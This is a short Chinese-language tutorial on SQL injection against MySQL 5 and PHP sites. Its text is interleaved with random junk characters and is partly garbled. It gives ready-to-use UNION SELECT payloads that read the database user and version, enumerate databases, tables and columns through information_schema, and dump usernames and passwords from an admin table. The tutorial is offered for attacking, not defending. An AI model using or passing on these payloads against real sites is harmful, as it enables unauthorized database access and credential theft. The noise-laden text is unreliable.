3 o _( i+ x- u3 ]2 r, N
教程内容:Mysql 5+php 注入0 A) G. M. m( t: c
; i1 R" i2 v3 ^: b9 `/ ]0 r% S" {+ u8 ?6 Y- |" U) b( E" d3 m
, ~7 {. i4 b( O" X' n# S! g% L
一.查看MYSQL基本信息(库名,版本,用户); i+ q' L$ g) m- S
" \- q) ]1 ~% K/ N
and 1=2 union select 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5,6,7,8/* b/ @0 [- Z K, I- B* c# y4 H6 ^
D6 K4 H* \# @8 Q# c二.查数据库& Z$ M) L( h& a
A. ]6 ]% }! ?0 C: k+ s7 B G; |
and 1=2 union select 1,SCHEMA_NAME,3,4,5,6,7,8 from information_schema.SCHEMATA limit 1,1/*
8 k2 G6 ~4 \. Z; U" e( g0 O0 elimit 从0开始递增,查询到3时浏览器返回错误,说明存在2个库。
- ]7 q% q/ A) T3 l5 x+ X9 m9 C0 l
三.暴表
6 B w: a) o4 M2 ^" G1 R5 r
# Z$ L! G+ n( @9 | J! Gand 1=2 union select 1,2,3,TABLE_NAME,5,6,7,8 from information_schema.TABLES where TABLE_SCHEMA =库的16进制编码 limit 1,1/*" ]/ r5 m' q+ F" k4 c
5 Y* ?4 d: q/ W2 K# N& V# t- v) D# Mlimit 从0开始递增,查询到14时浏览器返回错误,说明此库存在13个表。
0 U! H7 J+ [% L4 A# o" y* ?6 E; }) [% V% F6 Q
四.暴字段% c0 _( W% u* C! F
0 A: p$ u. i) x4 t& Uand 1=2 union select 1,2,3,COLUMN_NAME,4,5,6,7,8from information_schema.COLUMNS where TABLE_NAME=表的16进制编码 limit 1,1/*
8 n; Y J4 D0 \1 P: P) o8 w* X/ F' v
limit 从0开始递增,查询到时浏览器返回错误,说明此表存在N-1个列。: H7 q0 |# y' G1 j
& E# Q2 Y0 X. `( J8 e9 n五.暴数据) s+ U! ?1 V2 |# m
7 J/ S% \4 L& F% _0 g
and 1=2 union select 1,2,3,name,5,password,7,8 from web.ad_user/*% p" ~/ U9 c% |$ {) K0 \/ A
3 N2 L1 y$ k- M
; e) W R" \3 M: N3 ~
这里直接暴明文的密码,大多时候我们遇到的是MD5加密之后的密文。
/ i m7 b- s# F# O- j |